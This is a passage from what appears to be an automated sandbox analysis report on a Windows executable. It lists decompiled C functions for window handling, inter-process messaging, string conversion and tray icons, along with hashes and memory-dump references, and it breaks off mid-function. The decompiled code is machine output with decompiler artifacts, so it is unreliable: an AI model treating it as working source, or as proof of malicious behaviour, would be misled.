Instruction Fuzzy Hash: DB3126727007105FD7209E2AE981A57B7E9EB84325F51C82FF55ACB651DA3CE8018F19

Uniqueness

Uniqueness Score: -1.00%

Function 00426C36, Relevance: 7.6, APIs: 5, Instructions: 69
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426C36(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				signed int* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v284;
				char _v412;
				char _v540;
				char _v796;
				signed int _v800;
				signed int _v804;
				signed int _v808;
				signed int _v812;
				signed int _v816;
				signed int _v820;
				signed int _v824;
				signed int _v828;
				void* _t65;
				void* _t66;
				void* _t71;

				_t71 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2734)) == _a8) {
					_v16 = _v16 & 0x00000000;
					_v8 =  &_v828;
					_v828 =  *(__ecx + 0x1a19) & 0x000000ff;
					_v820 =  *(__ecx + 0x1a1a) & 0x000000ff;
					_v12 = 0x32c;
					_v808 =  *(__ecx + 0x1a1d) & 0x000000ff;
					_v812 =  *(__ecx + 0x1a1c) & 0x000000ff;
					_v816 =  *(__ecx + 0x1a1b) & 0x000000ff;
					_v804 =  *(__ecx + 0x1a1e) & 0x000000ff;
					_v800 =  *(__ecx + 0x1a20) & 0x000000ff;
					_v824 =  *(__ecx + 0x17f8) & 0x000000ff;
					_v28 =  *((intOrPtr*)(__ecx + 0x1d2c));
					_v24 =  *((intOrPtr*)(__ecx + 0x2724));
					lstrcpyA( &_v796, __ecx + 0x1a21);
					lstrcpyA( &_v412, _t71 + 0x1ba1);
					lstrcpyA( &_v284, _t71 + 0x1c21);
					lstrcpyA( &_v540, _t71 + 0x1b21);
					SendMessageA(_a4, 0x4a,  *(_t71 + 0x20),  &_v16);
					_t65 = 1;
					return _t65;
				}
				_t66 = 1;
				return _t66;
			}

0x00426c40
0x00426c4b
0x00426c5b
0x00426c5f
0x00426c6a
0x00426c7d
0x00426c83
0x00426c91
0x00426c9e
0x00426cab
0x00426cb8
0x00426cc5
0x00426cd2
0x00426cde
0x00426ce7
0x00426cf8
0x00426d08
0x00426d18
0x00426d28
0x00426d36
0x00426d3e
0x00000000
0x00426d3f
0x00426c4f
0x00000000

APIs

lstrcpyA.KERNEL32(?,?), ref: 00426CF8
lstrcpyA.KERNEL32(?,?), ref: 00426D08
lstrcpyA.KERNEL32(?,?), ref: 00426D18
lstrcpyA.KERNEL32(?,?), ref: 00426D28
SendMessageA.USER32(0000032C,0000004A,?,00000000), ref: 00426D36

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: lstrcpy$MessageSend
String ID:
API String ID: 749160242-0
Opcode ID: b6d26ba5f8d4390e3c33aa067d3c64cc3aee6b68844ba7bad5ae96af161ab111
Instruction ID: b37baa5249104efcf5716d1c0aac6bd7d8e342f899d5b1ba3a7299bb495c4d18
Opcode Fuzzy Hash: b6d26ba5f8d4390e3c33aa067d3c64cc3aee6b68844ba7bad5ae96af161ab111
Instruction Fuzzy Hash: BD3124B6905758AFC761CF74D850ADABBFCAF4D300F00459BE59AE2140D634A744CF60

Uniqueness

Uniqueness Score: -1.00%

Function 004250CC, Relevance: 7.6, APIs: 5, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004250CC(void* __ecx, void* __esi) {
				struct tagRECT _v20;
				void* _t17;
				long _t31;
				intOrPtr _t32;
				void* _t41;
				struct HWND__* _t45;

				_t41 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x74)) != 0 ||  *((intOrPtr*)(__ecx + 0x17df)) == 0) {
					return _t17;
				} else {
					_v20.top = 0;
					_v20.left = 0;
					_v20.right = GetSystemMetrics(0);
					_v20.bottom = GetSystemMetrics(1);
					if( *((intOrPtr*)(_t41 + 0x1e0c)) == 1) {
						_t45 = GetForegroundWindow();
						if(_t45 != 0 && IsWindowVisible(_t45) != 0) {
							GetWindowRect(_t45,  &_v20);
						}
					}
					_t31 = _v20.left;
					if(_v20.right - _t31 < 0x96) {
						_v20.right = _t31 + 0x96;
					}
					_t32 = _v20.top;
					if(_v20.bottom - _t32 < 0x96) {
						_v20.bottom = _t32 + 0x96;
					}
					E00428FAA( &_v20);
					return E00425177(_t41,  &_v20);
				}
			}

0x004250d4
0x004250db
0x00425176
0x004250ed
0x004250f5
0x004250f8
0x004250ff
0x0042510b
0x0042510e
0x00425116
0x0042511a
0x0042512c
0x0042512c
0x0042511a
0x00425135
0x00425142
0x00425146
0x00425146
0x00425149
0x00425153
0x0042515b
0x0042515b
0x00425162
0x00000000
0x0042516e

APIs

GetSystemMetrics.USER32 ref: 004250FB
GetSystemMetrics.USER32 ref: 00425102
GetForegroundWindow.USER32 ref: 00425110
IsWindowVisible.USER32(00000000), ref: 0042511D
GetWindowRect.USER32 ref: 0042512C

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$MetricsSystem$ForegroundRectVisible
String ID:
API String ID: 2547220785-0
Opcode ID: 9026f5075ed5be8e8a33aaf39338df44444bb1c6ee299f9af76925040e821230
Instruction ID: 20f177fdc121625a7624ab437cd72417c5ec394d5778d5826695189ebe9d50f2
Opcode Fuzzy Hash: 9026f5075ed5be8e8a33aaf39338df44444bb1c6ee299f9af76925040e821230
Instruction Fuzzy Hash: 5C118B72F01529AFCB05EFB9E9846BFBBB9AB84304F54417FD411A3300EB349A518B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE29, Relevance: 7.6, APIs: 5, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FE29(struct HWND__* _a4, CHAR* _a8, char _a12) {
				struct tagRECT _v20;
				struct HWND__* _v24;
				CHAR* _v28;
				char _v32;
				intOrPtr _v36;
				void* _v40;
				CHAR* _t18;
				struct HWND__* _t29;
				struct HWND__* _t31;
				struct HWND__* _t32;

				_t29 = _a4;
				_t31 = FindWindowExA(_t29, 0, _a8, 0);
				_a4 = _t31;
				_t32 = _t31;
				while(_t32 != 0) {
					_t18 = IsWindowVisible(_t31);
					if(_t18 != 0) {
						GetWindowRect(_t31,  &_v20);
						_v40 = _t31;
						_v28 = _a8;
						_v32 = _a12;
						_v36 = _v20.top;
						_v24 = _t29;
						EnumChildWindows(_t29, E0040FDB8,  &_v40);
						return _v40;
					}
					_t31 = FindWindowExA(_t29, _t31, _a8, _t18);
				}
				return 0;
			}

0x0040fe30
0x0040fe45
0x0040fe47
0x0040fe4a
0x0040fe66
0x0040fe4f
0x0040fe57
0x0040fe71
0x0040fe7a
0x0040fe7d
0x0040fe83
0x0040fe89
0x0040fe96
0x0040fe99
0x00000000
0x0040fe9f
0x0040fe61
0x0040fe63
0x00000000

APIs

FindWindowExA.USER32 ref: 0040FE43
IsWindowVisible.USER32(00000000), ref: 0040FE4F
FindWindowExA.USER32 ref: 0040FE5F
GetWindowRect.USER32 ref: 0040FE71
EnumChildWindows.USER32 ref: 0040FE99

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$Find$ChildEnumRectVisibleWindows
String ID:
API String ID: 3579691185-0
Opcode ID: ef0edb0084ceb0e7c3543bf440e48db764feec57a817c8ee32eed9ceb0e0aa9a
Instruction ID: e75c25b05c4f2b1e60ed192ae6dde79af439fc8429278a9425749aebadd2fa37
Opcode Fuzzy Hash: ef0edb0084ceb0e7c3543bf440e48db764feec57a817c8ee32eed9ceb0e0aa9a
Instruction Fuzzy Hash: 82113CB6901218ABCB11DFA9CC40AEFBBBCEF4D250F104436F905F3251D234AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0043EAB1, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0043EAB1(short* _a4) {
				char* _t4;
				signed int _t8;
				int _t18;
				char* _t22;
				short* _t24;

				_t24 = _a4;
				if(_t24 != 0) {
					_t4 = wcslen(_t24);
					_t3 =  &(_t4[2]); // 0x2
					_t18 =  &(_t4[_t3]);
					_push(_t18);
					L0043DD54();
					_t22 = _t4;
					if(_t22 == 0) {
						E0043E9F0(0x8007000e);
					}
					 *_t22 = 0;
					if(WideCharToMultiByte(0, 0, _t24, 0xffffffff, _t22, _t18, 0, 0) == 0) {
						if(GetLastError() == 0) {
							_t8 = 0;
						} else {
							_t8 = GetLastError() & 0x0000ffff | 0x80070000;
						}
						E0043E9F0(_t8);
					}
					return _t22;
				}
				return 0;
			}

0x0043eab3
0x0043eabb
0x0043eac4
0x0043eac9
0x0043eac9
0x0043eacd
0x0043eace
0x0043ead3
0x0043ead9
0x0043eae0
0x0043eae0
0x0043eaee
0x0043eaf8
0x0043eb04
0x0043eb14
0x0043eb06
0x0043eb0d
0x0043eb0d
0x0043eb17
0x0043eb17
0x00000000
0x0043eb1f
0x00000000

APIs

wcslen.MSVCRT ref: 0043EAC4
#823.MFC42(00000002,?,?,?,?,00000000,00409D20,?,?,00409C18,?), ref: 0043EACE
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,?,00000000,00409D20,?,?,00409C18), ref: 0043EAF0
GetLastError.KERNEL32(?,?,?,00000000,00409D20,?,?,00409C18,?), ref: 0043EB00
GetLastError.KERNEL32(?,?,?,00000000,00409D20,?,?,00409C18,?), ref: 0043EB06

Memory Dump Source

Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: ErrorLast$#823ByteCharMultiWidewcslen
String ID:
API String ID: 902154227-0
Opcode ID: 6951ab322b17c5da87c9fe049f9dd89af28fe3ae4bd12f589731f3ad1ac7a054
Instruction ID: dde1a227914c0c28cf223384fd86ab6a4fa66e8aeb10397f98373f6165d84f81
Opcode Fuzzy Hash: 6951ab322b17c5da87c9fe049f9dd89af28fe3ae4bd12f589731f3ad1ac7a054
Instruction Fuzzy Hash: 05F028622061597D9620B3775C85F3BBA8CDE8D3B9F15163FF111D21C1D91DAC01867D

Uniqueness

Uniqueness Score: -1.00%

Function 004105D6, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E004105D6(intOrPtr* __eax) {
				intOrPtr* _v8;
				void* _v12;
				intOrPtr* _t16;
				intOrPtr _t17;
				void* _t18;
				void* _t21;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;

				_t16 = __eax;
				_t28 = _t21;
				L0043DD54();
				 *((intOrPtr*)(__eax + 4)) = 0;
				 *((intOrPtr*)(__eax + 0x38)) = 1;
				_v8 = __eax;
				__imp__??0_Lockit@std@@QAE@XZ(0x40, _t27, _t30, _t18, _t21, _t21);
				_t34 =  *0x4553c0; // 0x2acaa0
				if(_t34 == 0) {
					 *0x4553c0 = __eax;
					 *__eax = 0;
					_t16 =  *0x4553c0; // 0x2acaa0
					_v8 = 0;
					 *((intOrPtr*)(_t16 + 8)) = 0;
				}
				 *0x4553c4 =  *0x4553c4 + 1;
				__imp__??1_Lockit@std@@QAE@XZ();
				if(_v8 != 0) {
					_push(_v8);
					L0043DD42();
				}
				_t32 =  *0x4553c0; // 0x2acaa0
				_push(0x40);
				L0043DD54();
				 *((intOrPtr*)(_t16 + 4)) = _t32;
				 *((intOrPtr*)(_t16 + 0x38)) = 0;
				 *((intOrPtr*)(_t28 + 4)) = _t16;
				 *((intOrPtr*)(_t28 + 0xc)) = 0;
				 *_t16 = _t16;
				_t17 =  *((intOrPtr*)(_t28 + 4));
				 *((intOrPtr*)(_t17 + 8)) = _t17;
				return _t17;
			}

0x004105d6
0x004105de
0x004105e2
0x004105ef
0x004105f2
0x004105f9
0x004105fc
0x00410602
0x00410608
0x0041060a
0x00410610
0x00410612
0x00410617
0x0041061a
0x0041061a
0x0041061d
0x00410626
0x0041062f
0x00410631
0x00410634
0x00410639
0x0041063a
0x00410640
0x00410642
0x00410647
0x0041064a
0x0041064d
0x00410650
0x00410653
0x00410655
0x0041065b
0x00410660

APIs

#823.MFC42(00000040), ref: 004105E2
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004105FC
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00410626
#825.MFC42(?), ref: 00410634
#823.MFC42(00000040), ref: 00410642

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823Lockit@std@@$#825??0_??1_
String ID:
API String ID: 2469163743-0
Opcode ID: ccc11db60c916be39a3b7c3e0c21070b077868423c4633142c0e02644440344f
Instruction ID: 41cdc837c15b9bae48bfe4c3ba374e0c96f3df02f8a16bb178822cc9ba3b3930
Opcode Fuzzy Hash: ccc11db60c916be39a3b7c3e0c21070b077868423c4633142c0e02644440344f
Instruction Fuzzy Hash: A41135B1800704EFC700DF9AE9869A9BBF4FF48315B6190BFE50997261D7B4A990CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0043EA3C, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0043EA3C(void* __ecx, CHAR* _a4) {
				void* _v12;
				int _t11;
				signed int _t13;
				void* _t16;
				short* _t17;
				int _t19;
				short* _t21;

				_t16 = __ecx;
				if(_a4 != 0) {
					_t19 = lstrlenA(_a4) + 1;
					E0043E690(_t19 + _t19 + 0x00000003 & 0x000000fc, _t16);
					_t17 = _t21;
					 *_t17 =  *_t17 & 0x00000000;
					_t11 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t17, _t19);
					if(_t11 == 0) {
						if(GetLastError() == 0) {
							_t13 = 0;
						} else {
							_t13 = GetLastError() & 0x0000ffff | 0x80070000;
						}
						_t11 = E0043E9F0(_t13);
					}
					__imp__#2(_t17);
				} else {
					_t11 = 0;
				}
				return _t11;
			}

0x0043ea3c
0x0043ea45
0x0043ea56
0x0043ea5f
0x0043ea64
0x0043ea6d
0x0043ea75
0x0043ea7d
0x0043ea89
0x0043ea99
0x0043ea8b
0x0043ea92
0x0043ea92
0x0043ea9c
0x0043ea9c
0x0043eaa2
0x0043ea47
0x0043ea47
0x0043ea47
0x0043eaae

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA4E
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA75
GetLastError.KERNEL32(?,00000001,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA85
GetLastError.KERNEL32(?,00000001,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA8B
SysAllocString.OLEAUT32 ref: 0043EAA2

Memory Dump Source

Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
String ID:
API String ID: 4196186757-0
Opcode ID: 0963cad40e0ed44314d6884b511ae66769e57e99f10d636e2d25e181fd8d1d50
Instruction ID: b22f9b5e660da52314e6c4045fb90c762401d17fb4cdc2ee7219b268a41ed0d6
Opcode Fuzzy Hash: 0963cad40e0ed44314d6884b511ae66769e57e99f10d636e2d25e181fd8d1d50
Instruction Fuzzy Hash: 9E012D32541116F7C7106B62CC06BAB3F9CFF56372F244532F900D11D0E738955196AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D958, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D958(void* __ecx) {
				intOrPtr* _t19;
				intOrPtr _t20;
				void* _t23;
				void* _t31;
				intOrPtr* _t34;
				void* _t36;

				_t19 = E0043E4E0(0x440026, _t36);
				_push(__ecx);
				_t31 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x10);
					L0043DD54();
					_t34 = _t19;
					 *((intOrPtr*)(_t36 - 0x10)) = _t34;
					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
					if(_t34 == 0) {
						_t34 = 0;
					} else {
						L0043DDD8();
					}
					_t20 =  *((intOrPtr*)(_t36 + 8));
					_push( *((intOrPtr*)(_t36 + 0xc)));
					 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
					 *_t34 = _t20;
					 *((intOrPtr*)(_t34 + 4)) =  *((intOrPtr*)(_t20 + 0x60));
					L0043DDD2();
					_push(_t34);
					 *((intOrPtr*)(_t34 + 8)) =  *((intOrPtr*)(_t36 + 0x10));
					_push( *((intOrPtr*)(_t31 + 0x47c)));
					L0043E204();
					_t23 = 1;
				} else {
					_t23 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t23;
			}

0x0040d95d
0x0040d962
0x0040d964
0x0040d96a
0x0040d971
0x0040d973
0x0040d978
0x0040d97b
0x0040d97e
0x0040d984
0x0040d990
0x0040d986
0x0040d989
0x0040d989
0x0040d992
0x0040d995
0x0040d998
0x0040d99c
0x0040d9a4
0x0040d9a7
0x0040d9b5
0x0040d9b6
0x0040d9b9
0x0040d9bc
0x0040d9c1
0x0040d96c
0x0040d96c
0x0040d96c
0x0040d9c8
0x0040d9d0

APIs

__EH_prolog.LIBCMT ref: 0040D95D
#823.MFC42(00000010), ref: 0040D973
#540.MFC42 ref: 0040D989
#860.MFC42(?), ref: 0040D9A7
#5860.MFC42(?,00000000,?), ref: 0040D9BC

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540#5860#823#860H_prolog
String ID:
API String ID: 2914896502-0
Opcode ID: 530de2f10ea31f1e891b6560cbcc4a802a21dd5f40e5638b98f38172b6202b7b
Instruction ID: 9692d2e4db55e420b5c6508e883a1f9dfd1c7a9cd8cf610db0b3766a229735e1
Opcode Fuzzy Hash: 530de2f10ea31f1e891b6560cbcc4a802a21dd5f40e5638b98f38172b6202b7b
Instruction Fuzzy Hash: 2A019E72900615EFCB14DFA9C401BAAF7A4FF08324F10862FE4AA972D1D778A905CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00428EEB, Relevance: 7.5, APIs: 5, Instructions: 41
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428EEB(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, CHAR* _a16, intOrPtr _a20) {
				struct _OSVERSIONINFOA _v152;
				intOrPtr _v156;
				char _v220;
				intOrPtr _v224;
				char _v480;
				struct _NOTIFYICONDATAA _v640;
				int _t23;

				_v152.dwOSVersionInfoSize = 0x94;
				_t23 = GetVersionExA( &_v152);
				if((_v152.dwPlatformId & 0x00000002) != 0 && _v152.dwMajorVersion >= 5) {
					memset( &_v640, 0, 0x1e8);
					_v640.hWnd = _a4;
					_v640.cbSize = 0x1e8;
					_v640.uFlags = 0x10;
